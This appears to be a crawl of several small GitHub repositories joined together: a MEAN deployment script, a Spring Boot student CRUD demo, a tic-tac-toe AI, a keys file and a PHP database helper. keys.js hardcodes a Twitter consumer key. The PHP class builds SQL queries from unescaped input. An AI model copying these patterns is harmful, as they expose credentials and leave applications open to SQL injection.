f47f946b5917c614db22791029bbcfa66e7b165a
|
refs/heads/master
|
<file_sep>The serverInit.sh script has been created to be run on a Debian-like system
that runs bash shell scripts; it requires the mongodb-org-3.4.list file to be
added in order to install MongoDB.
The purpose is to deploy a MEAN application as taught by Coding Dojo.
At this time, it only clones GitHub repos.
To use this script, once you have created an Ubuntu instance on Amazon Web
Services, ssh into the instance and git clone this repository to your server.
cd mean_deployment
Edit the nginx.conf file. The {{ private-ip }} tag needs to be replaced with
your server private IP address.
(TODO: add an ifconfig call that can dynamically replace the {{ private-ip }})
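One possible (untested) sketch for that TODO, assuming the first address
reported by hostname -I is the private IP:
sed -i "s/{{ private-ip }}/$(hostname -I | awk '{print $1}')/" nginx.conf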
Run ./serverInit.sh to execute this script and respond to the prompts for
GitHub user and repo information.
If you are not familiar with configuring a server manually, I suggest you do
so before using the shell script in case you need to troubleshoot the
deployment, but the point of using the script is to avoid any issues.
If deployment does not complete as expected, check if your project cloned
properly from GitHub.
<file_sep>#!/bin/bash
echo "Please enter the target project name(github repo and file name):"
read PROJECT_NAME
echo "Please enter the github user name:"
read USER_NAME
# Clone MEAN project from github location to /var/www/{{ PROJECT_NAME }}
sudo git clone https://github.com/$USER_NAME/$PROJECT_NAME /var/www/$PROJECT_NAME
# Add the key and move a sources list into the apt directory to add access to
# the MongoDB repositories for Ubuntu.
sudo mv mongodb-org-3.4.list /etc/apt/sources.list.d/
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv <KEY>
# Update and install all needed applications.
sudo apt-get update
sudo apt-get install -y build-essential \
openssl \
libssl-dev \
pkg-config \
tmux \
htop \
tree \
nginx \
git \
npm \
mongodb-org
# Clean npm cache
sudo npm cache clean -f
# Install n, the pm2 process manager, and bower globally
sudo npm install -g -y n pm2 bower
# And latest version of node
sudo n stable
echo"Installs complete. Moving on to configuration..."
# Move the nginx configuration file to the sites available/{{ PROJECT_NAME}}
# location
sudo mv nginx.conf /etc/nginx/sites-available/$PROJECT_NAME
# Move to the project file and install project dependencies
cd /var/www/$PROJECT_NAME
sudo npm install -y
sudo bower install --allow-root
# Remove nginx default site files.
sudo rm /etc/nginx/sites-available/default
sudo rm /etc/nginx/sites-enabled/default
# Create symlink to newly avaible project.
sudo ln -s /etc/nginx/sites-available/$PROJECT_NAME /etc/nginx/sites-enabled/$PROJECT_NAME
# Ensure mongod is started.
sudo service mongod start
# Move to the project directory and start the project.
cd /var/www/$PROJECT_NAME
pm2 start server.js
# Reload and restart nginx.
sudo service nginx reload && sudo service nginx restart
echo "Complete. Please check all components installed properly."
|
775f8ffab8ee6fc463be1ba27bbe0ebb5c982ac1
|
[
"Markdown",
"Shell"
] | 2
|
Markdown
|
globedasher/mean_deployment
|
311dcf973ad6847bf84f8f657e35bd7b1c334ef5
|
e91f68e1efcc03187e3390dfde87da6bb69ec467
|
refs/heads/master
|
<repo_name>tovarb/solucion-curricula-js<file_sep>/mi-primera-web/app.js
alert("Bienvenida al curso de JS")
|
cbcdbb34ee9e56500bfa1d61f9da1e458d5674f5
|
[
"JavaScript"
] | 1
|
JavaScript
|
tovarb/solucion-curricula-js
|
669117772c51f4b93e47780c45eb961ab485fb32
|
74d39cef3fc63e450503098ae10e2bbc4f70c6bd
|
refs/heads/master
|
<repo_name>vijaychopra/ProgrammingAssignment2<file_sep>/cachematrix.R
## makeCacheMatrix and cacheSolve functions are used together to find inverse of a matrix.
## makeCacheMatrix caches the value of the inverse of the matrix so that it can be looked up
## in the cache when we need it again instead of recomputing it.
makeCacheMatrix <- function(x = matrix()) {
## inverse is Cache variable which stores the value of the inverse
inverse <- NULL
## setmatrixfunction sets the cache variable with the matrix whose inverse has been already calculated
setmatrix <- function(y) {
x <<- y
inverse <<- NULL
}
## getmatrix function gets the matrix whose inverse needs to be calculated
getmatrix <- function() x
## setinverse function sets the cache variable with the inverse value for the matrix
setinverse <- function(inversematrix) inverse <<- inversematrix
## getinverse function returns the inverse value present in cache
getinverse <- function() inverse
list(setmatrix = setmatrix, getmatrix = getmatrix,
setinverse = setinverse, getinverse = getinverse)
}
## cacheSolve checks if the inverse of the matrix was already computed and is present in the
## cache before calculating it. If its already present, it uses the value from the cache. If
## not, it recalculates it.
cacheSolve <- function(x, ...) {
## Check whether the inverse has already been calculated.
## If the inverse value is already present in cache, then the same is returned.
inverse <- x$getinverse()
if(!is.null(inverse)) {
message("getting cached data")
return(inverse)
}
data <- x$getmatrix()
## If the inverse value is not present in cache, then it is calculated.
inverse <- solve(data, ...)
x$setinverse(inverse)
inverse
}
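## Example usage (illustrative):
## m <- makeCacheMatrix(matrix(c(2, 0, 0, 2), 2, 2))
## cacheSolve(m)  # computes the inverse and caches it
## cacheSolve(m)  # prints "getting cached data" and returns the cached inverse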
|
664582714297a400c965b8421db658f67454ce0f
|
[
"R"
] | 1
|
R
|
vijaychopra/ProgrammingAssignment2
|
e00740cc1d00be1fb471e261677f0508cc12a773
|
f9686eeacaae93f9c142ec63f0960f664a111663
|
refs/heads/master
|
<repo_name>steviesovak/LIRI-Bot<file_sep>/keys.js
console.log('Keys is loaded');
var twitterKeys = {
consumer_key: 'jvoKd1Z25wNcIVc271qxvq0jO',
consumer_secret: '<KEY>',
access_token_key: '<KEY>',
access_token_secret: '<KEY>',
}
module.exports = twitterKeys;
// Attach the Spotify credentials to the same exported object; writing to
// `exports.spotify` after reassigning module.exports would silently drop them.
module.exports.spotify = {
  id: process.env.SPOTIFY_ID,
  secret: process.env.SPOTIFY_SECRET
};
|
85c86c189d8f7da33882549c8fb2a839d1580273
|
[
"JavaScript"
] | 1
|
JavaScript
|
steviesovak/LIRI-Bot
|
e41cd40b2f73355dcd101a04e07808feeb595a9b
|
32bcb96096e4c14665ba49e230774c01b5fc9a3d
|
refs/heads/main
|
<file_sep>package com.example.demo.controllers;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.servlet.ModelAndView;
import com.example.demo.interfaces.StudentRepository;
import com.example.demo.models.Student;
@Controller
public class StudentViewController {
private final StudentRepository repo;
@Autowired
public StudentViewController(StudentRepository repo) {
super();
this.repo = repo;
}
@RequestMapping("/student")
public ModelAndView getStudents() {
ModelAndView mv = new ModelAndView("allStudents.jsp");
List<Student> students = repo.findAll();
mv.addObject("students", students);
return mv;
}
@RequestMapping("/studentDetail:id={studentId}")
public ModelAndView getStudent(@PathVariable int studentId) {
ModelAndView mv = new ModelAndView("viewStudent.jsp");
Student student = repo.findById(studentId).orElse(null);
mv.addObject("student", student);
return mv;
}
@RequestMapping("/newStudent")
public String newStudent() {
return "newStudent.jsp";
}
@RequestMapping("/addStudent")
public String addStudent(Student student) {
repo.save(student);
return "newStudent.jsp";
}
@RequestMapping("/editStudent:id={studentId}")
public ModelAndView editStudent(@PathVariable int studentId) {
ModelAndView mv = new ModelAndView("editStudent.jsp");
Student student = repo.findById(studentId).orElse(null);
mv.addObject("student", student);
return mv;
}
@RequestMapping("/updateStudent")
public String updateStudent(Student student) {
repo.save(student);
return "redirect:/student";
}
@RequestMapping("/deleteStudent:id={studentId}")
public String deleteStudent(@PathVariable int studentId) {
Student student = repo.getById(studentId);
repo.delete(student);
return "redirect:/student";
}
}
<file_sep>insert into student (student_id, first_name, last_name, email) values (1, 'amy', 'ou', '<EMAIL>');
insert into student (student_id, first_name, last_name, email) values (2, 'ben', 'lan', '<EMAIL>');
insert into student (student_id, first_name, last_name, email) values (3, 'calo', 'sun', '<EMAIL>');
insert into student (student_id, first_name, last_name, email) values (4, 'deny', 'lee', '<EMAIL>');
insert into student (student_id, first_name, last_name, email) values (5, 'sun', 'windy', '<EMAIL>');
insert into student (student_id, first_name, last_name, email) values (6, 'scott', 'neil', '<EMAIL>');<file_sep>package com.example.demo.controllers;
import java.util.List;
import java.util.Optional;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;
import com.example.demo.models.Student;
import com.example.demo.services.StudentService;
@RestController
public class StudentController {
private final StudentService service;
public StudentController(StudentService service) {
super();
this.service = service;
}
@GetMapping("/students")
public List<Student> getStudents(){
return service.getStudents();
}
@GetMapping("/students/{studentId}")
public Optional<Student> getStudent(@PathVariable int studentId) {
return service.getStudent(studentId);
}
@PostMapping("/students")
public Student addStudent(@RequestBody Student student) {
return service.addStudent(student);
}
@PutMapping("/students")
public Student updateStudent(@RequestBody Student student) {
return service.updateStudent(student);
}
@DeleteMapping("/students/{studentId}")
public String deleteStudent(@PathVariable int studentId) {
return service.deleteStudent(studentId);
}
}
<file_sep># Spring Boot MVC Demo
<ul>
<li>Demo for using Spring Boot MVC to build RESTful CRUD API and JSP Web Application</li>
<li>Use Student Model to demonstrate how to Create, Read, Update, and Delete Student Object</li>
<li>H2 database is used to store and access data</li>
</ul>
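<p>Example request against a local run (assuming Spring Boot's default port 8080): <code>curl http://localhost:8080/students</code></p>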
<hr />
<h3> Get all students (top:API, bottom:JSP) </h3>
<img src="./images/allStudents_postman.png">
<hr />
<img src="./images/allStudents_jsp.png">
<hr />
<h3> Get a student (top:API, bottom:JSP) </h3>
<img src="./images/viewStudent_postman.png">
<hr />
<img src="./images/viewStudent_jsp.png">
<hr />
<h3> Post new student (top:API, bottom:JSP) </h3>
<img src="./images/addStudent_postman.png">
<hr />
<img src="./images/addStudent_jsp.png">
<hr />
<h3> Update a student (top:API, bottom:JSP) </h3>
<img src="./images/editStudent_postman.png">
<hr />
<img src="./images/editStudent_jsp.png">
<hr />
<h3> Delete a student (top:API, bottom:JSP) </h3>
<img src="./images/deleteStudent_postman.png">
<hr />
<img src="./images/deleteStudent_jsp.png">
<file_sep>package com.example.demo.services;
import java.util.List;
import java.util.Optional;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import com.example.demo.interfaces.StudentRepository;
import com.example.demo.models.Student;
@Service
public class StudentService {
private final StudentRepository repo;
@Autowired
public StudentService(StudentRepository repo) {
super();
this.repo = repo;
}
public List<Student> getStudents(){
return repo.findAll();
}
public Optional<Student> getStudent(int studentId) {
return repo.findById(studentId);
}
public Student addStudent(Student student) {
repo.save(student);
return student;
}
public Student updateStudent(Student student) {
repo.save(student);
return student;
}
public String deleteStudent(int studentId) {
Student student = repo.getById(studentId);
repo.delete(student);
return "Successfully deleted student";
}
}
|
7f73a95fb7c0f80c27172f3647a89d9c717b70f9
|
[
"Markdown",
"Java",
"SQL"
] | 5
|
Java
|
AmyOuY/SpringBootMVCdemo
|
5dd86c95ffa51dc37b1f8e89b43fe8508158fa70
|
8309e2b97a41ca3da7277d6f8c5c3066c8b14641
|
refs/heads/master
|
<repo_name>szomolanyi/TicTacToe<file_sep>/README.md
TicTacToe game - FreeCodeCamp project.
<file_sep>/src/unit_test.js
/*jshint esversion:6*/
const ft = require("./func_tools.js");
function unit_test() {
test_analyse('analyse move 1 ... ', ft.analyseMove(0, [], 'x'), {'trinities': 0, 'pairs': 0});
test_analyse('analyse move 2 ... ', ft.analyseMove(0, [undefined, 'x'], 'x'), {'trinities': 0, 'pairs': 1});
test_analyse('analyse move 3 ... ', ft.analyseMove(0, [undefined, 'x', 'x'], 'x'), {'trinities': 1, 'pairs': 0});
test_analyse('analyse move 4 ... ', ft.analyseMove(1, ['x', undefined, 'x'], 'x'), {'trinities': 2, 'pairs': 0});
test_analyse('analyse move 5 ... ', ft.analyseMove(4, [undefined, 'x', undefined, 'x'], 'x'), {'trinities': 0, 'pairs': 2});
test_analyse('analyse move 6 ... ', ft.analyseMove(0, [undefined, undefined, 'x'], 'x'), {'trinities': 0, 'pairs': 1});
test_analyse('analyse move 7 ... ', ft.analyseMove(7, ['x', 'o', undefined, undefined, 'o', undefined, undefined, undefined, 'x'], 'x'), {'trinities': 0, 'pairs': 1});
test_rank('compareRanks 1 ... ', ft.compareRanks([0,1,2,9],[0,1,7]), 1);
/*test_cmp('find_trinity 3 ... ', ft.find_trinity([0,1], []), [2]);
test_cmp('find pairs 3 ... ', ft.find_pairs_for_position(ft.Position(4), [undefined,'x',undefined,'x'], 'x'),[[1,4],[3,4]]);
test_cmp('find pairs 9 ... ', ft.find_pairs_for_position(ft.Position(1), ['x', undefined, undefined, undefined, 'o', undefined, undefined, 'o', undefined], 'x'),
[[0,1]]);
console.log('to2d(0) ...', ft.cmp(ft.to2d(0), [0,0]), 0===ft.to1d(ft.to2d(0)));
console.log('to2d(1) ...', ft.cmp(ft.to2d(1), [1,0]), 1===ft.to1d(ft.to2d(1)));
console.log('to2d(2) ...', ft.cmp(ft.to2d(2), [2,0]), 2===ft.to1d(ft.to2d(2)));
console.log('to2d(3) ...', ft.cmp(ft.to2d(3), [0,1]), 3===ft.to1d(ft.to2d(3)));
console.log('to2d(4) ...', ft.cmp(ft.to2d(4), [1,1]), 4===ft.to1d(ft.to2d(4)));
console.log('to2d(5) ...', ft.cmp(ft.to2d(5), [2,1]), 5===ft.to1d(ft.to2d(5)));
console.log('to2d(6) ...', ft.cmp(ft.to2d(6), [0,2]), 6===ft.to1d(ft.to2d(6)));
console.log('to2d(7) ...', ft.cmp(ft.to2d(7), [1,2]), 7===ft.to1d(ft.to2d(7)));
console.log('to2d(8) ...', ft.cmp(ft.to2d(8), [2,2]), 8===ft.to1d(ft.to2d(8)));
console.log('test direction 1 ... ', ft.cmp(
ft.direction(ft.Position(5), ft.Position(7)),
[-1, 1])
);
console.log('test direction 2 ... ', ft.cmp(
ft.direction(ft.Position(7), ft.Position(5)),
[1, -1])
);
console.log('test direction 3 ... ', ft.cmp(
ft.direction(ft.Position(1), ft.Position(2)),
[1, 0])
);
console.log('test direction 4 ... ', ft.cmp(
ft.direction(ft.Position(1), ft.Position(4)),
[0, 1])
);
console.log('test direction 5 ... ', ft.cmp(
ft.direction(ft.Position(4), ft.Position(1)),
[0, -1])
);
console.log('test mv 1 ... ', ft.cmp(ft.mv([0,0], [1,0], []), [1,0]));
console.log('test mv 2 ... ', ft.cmp(ft.mv([0,0], [-1,0], []), undefined));
console.log('test mv 3 ... ', ft.cmp(ft.mv([0,1], [0,1], []), [0,2]));
console.log('test mv 4 ... ', ft.cmp(ft.mv([2,1], [-1,-1], []), [1,0]));
console.log('find_trinity 1 ... ', ft.cmp(ft.find_trinity([1,2], []), [0]));
console.log('find_trinity 2 ... ', ft.cmp(ft.find_trinity([1,2], ['x','x']), []));
console.log('find_trinity 4 ... ', ft.cmp(ft.find_trinity([0,4], []), [8]));
console.log('find_trinity 5 ... ', ft.cmp(ft.find_trinity([2,5], []), [8]));
console.log('find_trinity 6 ... ', ft.cmp(ft.find_trinity([0,3], []), [6]));
console.log('find_trinity 7 ... ', ft.cmp(ft.find_trinity([4,6], []), [2]));
console.log('find_trinity 8 ... ', ft.cmp(ft.find_trinity([1,5], []), []));
console.log('find pairs 1 ... ', ft.cmp(ft.find_pairs_for_position(ft.Position(4), [], 'x'), []));
console.log('find pairs 2 ... ', ft.cmp(ft.find_pairs_for_position(ft.Position(4), [undefined,'x'], 'x'), [[1,4]]));
console.log('find pairs 4 ... ', ft.cmp(ft.find_pairs_for_position(ft.Position(4), [undefined,'x',undefined,'x'], 'x'),[[1,4],[3,4]]));
console.log('find pairs 5 ... ', ft.cmp(ft.find_pairs_for_position(ft.Position(1), [], 'x'), []));
test_cmp('find pairs 7 ... ', ft.find_pairs_for_position(ft.Position(8), ['o', undefined, undefined, 'o', 'x', undefined, undefined, undefined, undefined], 'x'),
[]);
test_cmp('find pairs 8 ... ', ft.find_pairs_for_position(ft.Position(7), ['o', undefined, undefined, 'o', 'x', undefined, undefined, undefined, undefined], 'x'),
[[4,7]]);*/
}
function test_rank(text, res, expected) {
if (res === expected) {
console.log(text, true);
}
else {
console.log(text, false);
}
}
function test_analyse(text, res, expected) {
if (!res ) {
console.log(text, false, '; result=');
console.log(res);
return;
}
if (res.pairs === expected.pairs && res.trinities === expected.trinities)
console.log(text, true);
else {
console.log(text, false, '; result=');
console.log(res);
}
}
function test_cmp(text, rr, res) {
if (ft.cmp(rr, res)) {
console.log(text, true);
}
else {
console.log(text, false, '; result=');
console.log(rr);
}
}
module.exports = unit_test;
<file_sep>/src/func_tools.js
/*jshint esversion:6*/
const all_dirs = [
[0,-1], [1,-1], [1,0], [1,1], [0,1], [-1,1], [-1,0], [-1,-1]
];
const ft = {
Position: function(i) {
if (i<0 || i>8) return(undefined); //out of map
return {
index: i,
x: i%3,
y: Math.trunc(i/3),
mv: function(direction) {
let ynew = this.y+direction[1];
let xnew = this.x+direction[0];
if (xnew>=0 && xnew<3 && ynew>=0 && ynew<3)
return ft.Position(ynew*3+xnew);
else {
return undefined;
}
}
};
},
opponent: function(kind) {
if (kind === 'x') return 'o';
else return 'x';
},
reverse_direction: function(d) {
return [-1*d[0], -1*d[1]];
},
get_pos: function(position, move_map) {
if (!position) return undefined;
return move_map[position.index];
},
opos_dir: function(dir) {
return [dir[0]*-1, dir[1]*-1];
},
cmp: function(array1, array2) {
if (array1 === undefined && array2 === undefined) return true;
return (array1.length == array2.length) && array1.every(function(element, index) {
if (Array.isArray(element) && Array.isArray(array2[index])) return ft.cmp(element, array2[index]);
else return element === array2[index];
});
},
is_middle_side: function(pos) {
return (pos===1 || pos===3 || pos === 5 || pos === 7);
},
is_corner: function(pos) {
return (pos===0 || pos===2 || pos===6 || pos===8);
},
opposite_corner: function(pos) {
if (pos === 0) return 8;
if (pos === 2) return 6;
if (pos === 6) return 2;
if (pos === 8) return 0;
},
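// Compares two rank lists by their strongest entries: both are sorted
// ascending (in place), then walked from the back. Returns 1 if rank1 is
// stronger, 2 if rank2 is stronger, 0 on a tie.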
compareRanks(rank1, rank2) {
let rs1 = rank1.sort((a,b)=>a-b);
let rs2 = rank2.sort((a,b)=>a-b);
let i1 = rs1.length-1;
let i2 = rs2.length-1;
while (i1 >= 0 && i2 >=0) {
if (rs1[i1] > rs2[i2]) return 1;
if (rs1[i1] < rs2[i2]) return 2;
i1-=1;
i2-=1;
}
if (i1 === i2) return 0;
if (i1 > i2) return 1;
else return 2;
},
findTurn: function(player, move_map, level) {
if (!level) level=0;
/* turn_rank :
0 : random
1 : Empty side: The player plays in a middle square on any of the 4 sides.
2 : Empty corner: The player plays in a corner square.
3 : Opposite corner: If the opponent is in the corner, the player plays the opposite corner.
4 : Center: A player marks the center. (If it is the first move of the game, playing on a corner gives "O" more opportunities to make a mistake and may therefore be the better choice; however, it makes no difference between perfect players.)
5 : Blocking, Option 2: If there is a configuration where the opponent can fork, the player should block that fork.
6 : Blocking, Option 1: The player should create two in a row to force the opponent into defending, as long as it doesn't result in them creating a fork. For example, if "X" has a corner, "O" has the center, and "X" has the opposite corner as well, "O" must not play a corner in order to win. (Playing a corner in this scenario creates a fork for "X" to win.)
7 : Blocking an opponent's fork
8 : Fork: Create an opportunity where the player has two threats to win (two non-blocked lines of 2).
9 : Block: If the opponent has two in a row, the player must play the third themselves to block the opponent.
10 : Win: If the player has two in a row, they can place a third to get three in a row.
*/
let optimal_move = -1;
let best_ranks=[];
for (let i=0; i<9; i++) {
if (!move_map[i]) {
//console.log(`checkTurn[${level},${player},${i}]`);
let ranks = [];
ranks.push(0);
if (ft.is_middle_side(i)) {
//1 : Empty side: The player plays in a middle square on any of the 4 sides.
//optimal_move = i;
ranks.push(1);
}
if (ft.is_corner(i)) {
//Empty corner: The player plays in a corner square.
//optimal_move = i;
ranks.push(2);
}
if (ft.is_corner(i) &&
move_map[ft.opposite_corner(i)] === ft.opponent(player)) {
//3 : Opposite corner: If the opponent is in the corner,
//the player plays the opposite corner.
//optimal_move = i;
ranks.push(3);
}
if (i===4) {
//Center: A player marks the center. (If it is the first move of the game,
//playing on a corner gives "O" more opportunities to make a mistake
//and may therefore be the better choice;
//however, it makes no difference between perfect players.)
//optimal_move = i;
ranks.push(4);
}
let opponent_moves = ft.analyseMove(i, move_map, ft.opponent(player));
if (opponent_moves.pairs > 1) {
//5 : Blocking, Option 2: If there is a configuration where the opponent can fork,
//the player should block that fork.
//optimal_move = i;
ranks.push(5);
}
let my_moves = ft.analyseMove(i, move_map, player );
if (opponent_moves.pairs > 1) {
//7 : Blocking an opponent's fork
//optimal_move = i;
ranks.push(6);
}
if (my_moves.pairs > 0) {
//6 : Blocking, Option 1: The player should create two in a row to force the opponent into defending,
//as long as it doesn't result in them creating a fork. For example, if "X" has a corner,
//"O" has the center, and "X" has the opposite corner as well,
//"O" must not play a corner in order to win.
//(Playing a corner in this scenario creates a fork for "X" to win.)
let tmp_res=[];
if (level === 0) {
let tmp_map = move_map.slice();
tmp_map[i] = player; //simulate turn
tmp_res = ft.findTurn(ft.opponent(player), tmp_map, 1);
let ranks_temp = tmp_res[1];
if (ranks_temp.indexOf(8) === -1) {
//optimal_move = i;
ranks.push(7);
}
}
}
if (my_moves.pairs > 1) {
//8 : Fork: Create an opportunity where the player has two threats to win (two non-blocked lines of 2).
//optimal_move = i;
ranks.push(8);
}
if (opponent_moves.trinities > 0) {
//9 : Block: If the opponent has two in a row, the player must play the third themselves to block the opponent.
//optimal_move = i;
ranks.push(9);
}
if (my_moves.trinities > 0) {
//10 : Win: If the player has two in a row, they can place a third to get three in a row.
//optimal_move = i;
ranks.push(10);
}
if (ft.compareRanks(best_ranks, ranks) === 2) {
optimal_move=i;
best_ranks = ranks.slice(0);
}
//console.log(`checkTurn end [${level},${player},${i}]=${optimal_move} ranks=${ranks} best_ranks=${best_ranks}`);
}
}
//console.log(`findTurn end [${level},${player}]=${optimal_move} best_ranks=${best_ranks}`);
return [optimal_move, best_ranks];
},
player_pos: function(pos, move_map, player) {
return pos && move_map[pos.index] === player;
},
free_pos: function(pos, move_map) {
return pos && !move_map[pos.index];
},
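// Scores a candidate move for `player`: counts "trinities" (lines the move
// would complete, i.e. two own marks already in line) and open "pairs"
// (one own mark plus a free cell in line with the move).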
analyseMove: function(move, move_map, player) {
let p=ft.Position(move);
return all_dirs.reduce(function(res, dir) {
//analyse all directions
let p1 = p.mv(dir);
let p2 = null;
if (p1) p2 = p1.mv(dir);
let p_opos = p.mv(ft.opos_dir(dir));
if (ft.player_pos(p1, move_map, player) && ft.player_pos(p2, move_map, player))
res.trinities++;
if (ft.player_pos(p1, move_map, player) && ft.player_pos(p_opos, move_map, player))
res.trinities++;
else if (ft.player_pos(p_opos, move_map, player) && ft.free_pos(p1, move_map))
res.pairs++;
else if (ft.player_pos(p1, move_map, player) && ft.free_pos(p2, move_map))
res.pairs++;
else if (ft.player_pos(p2, move_map, player) && ft.free_pos(p1, move_map))
res.pairs++;
return res;
}, {
pairs: 0,
trinities: 0
});
}
};
module.exports = ft;
|
92c55385be0cf132be131e7ba46baaa77ca4db11
|
[
"Markdown",
"JavaScript"
] | 3
|
Markdown
|
szomolanyi/TicTacToe
|
8073ba8ced4a46f2c3707af085a60e37289676ac
|
9d3b5955e38666938e047a11fbef202557ee549b
|
refs/heads/master
|
<file_sep><?php
class L{
// Переменная для подключения к бд
static private $connection;
static private $arr;
static private $freeze = false;
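// Reads the column metadata of $table (DESCRIBE) into self::$arr,
// fetching up to 250 rows and dropping the empty trailing entries.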
static private function describe($table){
$q = mysqli_query(self::$connection,"DESCRIBE `$table`");
$qu = mysqli_query(self::$connection,"SELECT COUNT(1) FROM `$table`");
$count = mysqli_fetch_array($qu);
self::$arr = [];
for($i = 0;$i < 250;$i++){
self::$arr[$i] = mysqli_fetch_array($q);
}
foreach (self::$arr as $key => $value) {
if(trim(gettype($value)) != 'array'){
unset(self::$arr[$key]);
}
}
}
public function tables(){
$q = mysqli_query(self::$connection, "SHOW TABLES");
$quer = mysqli_fetch_array($q);
$arr = [];
$i = 0;
while($i < 250){
$i++;
$arr[$i] = mysqli_fetch_array($q);
}
foreach ($arr as $key => $value) {
if(trim(gettype($value)) != 'array'){
unset($arr[$key]);
}
}
return $arr;
}
public function showStruct($table){
self::describe($table);
return self::$arr;
}
public function sql($command){
mysqli_query(self::$connection, $command);
}
public function freeze(){
self::$freeze = true;
}
public function unfreeze(){
self::$freeze = false;
}
// Connect to the database
public function setup($host,$dbname,$login,$pass){
self::$connection = mysqli_connect($host,$login,$pass,$dbname);
}
// Search the table by the given condition ($condition)
public function read($table,$condition){
$result = mysqli_query(self::$connection,"SELECT * FROM `$table` WHERE $condition ");
return mysqli_fetch_array($result);
}
// Delete rows matching the condition
public function del($table,$condition){
$del = "DELETE FROM `$table` WHERE $condition";
$result = mysqli_query(self::$connection,$del);
}
// Completely truncate the table
public function clear($table){
$clr = "TRUNCATE TABLE `$table`";
$result = mysqli_query(self::$connection,$clr);
}
// Returns all the table's rows as a two-dimensional array
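// NOTE: this assumes ids run contiguously from 1; rows deleted in the
// middle will leave gaps in the result.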
public function readAll($table,$limit = false){
$arr = array();
$q = mysqli_query(self::$connection,"SELECT COUNT(1) FROM `$table`");
$count = mysqli_fetch_array($q);
for($i = 1;$i < $count[0] + 1;$i++){
$result = mysqli_query(self::$connection,"SELECT * FROM `$table` WHERE id = $i");
$arr['id-'.$i] = mysqli_fetch_array($result);
}
return $arr;
}
// Builds the array that update() will work with
public function load($table,$id){
$variable = array('table' => $table,'id' => (int)$id);
return $variable;
}
// Updates a database record by id
public function update($variable){
$update = "
UPDATE
`".$variable['table']."`
SET
";
foreach ($variable as $key => $value) {
if(trim($key) != 'table' && trim($key) != 'id'){
if(trim(gettype($value)) == 'string'){
$update = $update.'`'.$key.'` = \''.$value.'\',';
}else{
$update = $update.'`'.$key.'` = '.$value.',';
}
}
}
$update = substr($update,0,-1);
$update = $update."
WHERE
id = ".$variable['id']."";
$q = mysqli_query(self::$connection,$update);
}
// Builds the array for store()
public function dispense($table){
$arr = array('table' => $table);
return $arr;
}
// Creates the table if it does not exist and inserts the record into it
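// When $freeze is false, columns missing from an existing table are added
// via ALTER TABLE, with the SQL type inferred from the PHP value
// (string -> TEXT, integer -> INT, double/float -> FLOAT). The trailing
// CREATE TABLE only takes effect when the table does not exist yet.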
public function store($variable){
if(self::$freeze == false){
self::describe($variable['table']);
$arr = [];
$arr2 = [];
$arr3 = [];
foreach($variable as $key => $value){
if(trim($key) != 'table'){
$arr[$key] = $value;
}
}
foreach (self::$arr as $key => $value) {
if(trim(gettype($value)) == 'array'){
foreach (self::$arr[$key] as $key => $value) {
if($key == 'Field'){
array_push($arr2,$value);
}
}
}
}
foreach ($arr as $key => $value) {
if(in_array($key, $arr2)){
}else{
$arr3[$key] = $value;
};
}
foreach ($arr3 as $key => $value) {
if(trim($key) != 'table'){
if(trim(gettype($value)) == 'string'){
$q = mysqli_query(self::$connection,"ALTER TABLE `".$variable['table']."` ADD `".$key."` TEXT(65535) AFTER `".array_pop($arr2)."`");
}
if(gettype($value) == 'integer'){
$q = mysqli_query(self::$connection,"ALTER TABLE `".$variable['table']."` ADD `".$key."` INT(128) AFTER `".array_pop($arr2)."`");
}
if(gettype($value) == 'double'||gettype($value) == 'float'){
$q = mysqli_query(self::$connection,"ALTER TABLE `".$variable['table']."` ADD `".$key."` FLOAT(53) AFTER `".array_pop($arr2)."`");
};
}
}
}else{
self::describe($variable['table']);
$arr = [];
$arr2 = [];
$arr3 = [];
foreach($variable as $key => $value){
if(trim($key) != 'table'){
$arr[$key] = $value;
}
}
foreach (self::$arr as $key => $value) {
if(trim(gettype($value)) == 'array'){
foreach (self::$arr[$key] as $key => $value) {
if($key == 'Field'){
array_push($arr2,$value);
}
}
}
}
foreach ($arr as $key => $value) {
if(in_array($key, $arr2)){
}else{
$arr3[$key] = $value;
};
}
}
$insert = "INSERT INTO `".$variable['table']."`(";
foreach ($variable as $key => $value) {
if(trim($key) != 'table'){
if(!array_key_exists($key,$arr3)){
$insert = $insert.''.$key.',';
}
}
}
$insert = substr($insert,0,-1);
$insert = $insert.") VALUES(";
foreach ($variable as $key => $value) {
if(trim($key) != 'table'){
if(!array_key_exists($key,$arr3)){
if(trim(gettype($value)) == 'string'){
$insert = $insert.'\''.$value.'\',';
}else{
$insert = $insert.''.$value.',';
}
}
}
}
$insert = substr($insert,0,-1);
$insert = $insert.')';
foreach ($variable as $key => $value) {
if(trim($key) != 'table'){
if(trim(gettype($value)) == 'string'&&strlen($value) < 512){
$variable[$key] = $key.' TEXT(512),
';
}elseif(trim(gettype($value)) == 'string'&&strlen($value) > 512&&strlen($value) <= 1024){
$variable[$key] = $key.' TEXT(1024),
';
}elseif(trim(gettype($value)) == 'string'&&strlen($value) > 1024&&strlen($value) <= 2048){
$variable[$key] = $key.' TEXT(2048),
';
}elseif(trim(gettype($value)) == 'string'&&strlen($value) > 2048&&strlen($value) <= 4096){
$variable[$key] = $key.' TEXT(4096),
';
}elseif(trim(gettype($value)) == 'string'&&strlen($value) > 4096){
$variable[$key] = $key.' TEXT(65535),
';
}
if(gettype($value) == 'integer'){
$variable[$key] = $key.' INT(128),
';
}
if(gettype($value) == 'double'||gettype($value) == 'float'){
$variable[$key] = $key.' FLOAT(53),
';
}
}
};
$query = "
CREATE TABLE ".$variable['table']."(
id INT(20) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
";
foreach ($variable as $key => $value) {
if(trim($key) != 'table'){
$query = $query.''.$value;
}
};
$query = substr($query,0,-3);
$query = $query.'
)';
$q = mysqli_query(self::$connection,$query);
$q = mysqli_query(self::$connection,$insert);
}
public function close(){
mysqli_close(self::$connection);
}
}
?>
|
bfb737bf5d4ec26daa28404d576a60af15e8420b
|
[
"PHP"
] | 1
|
PHP
|
PeGrina/Lyricon-ORM
|
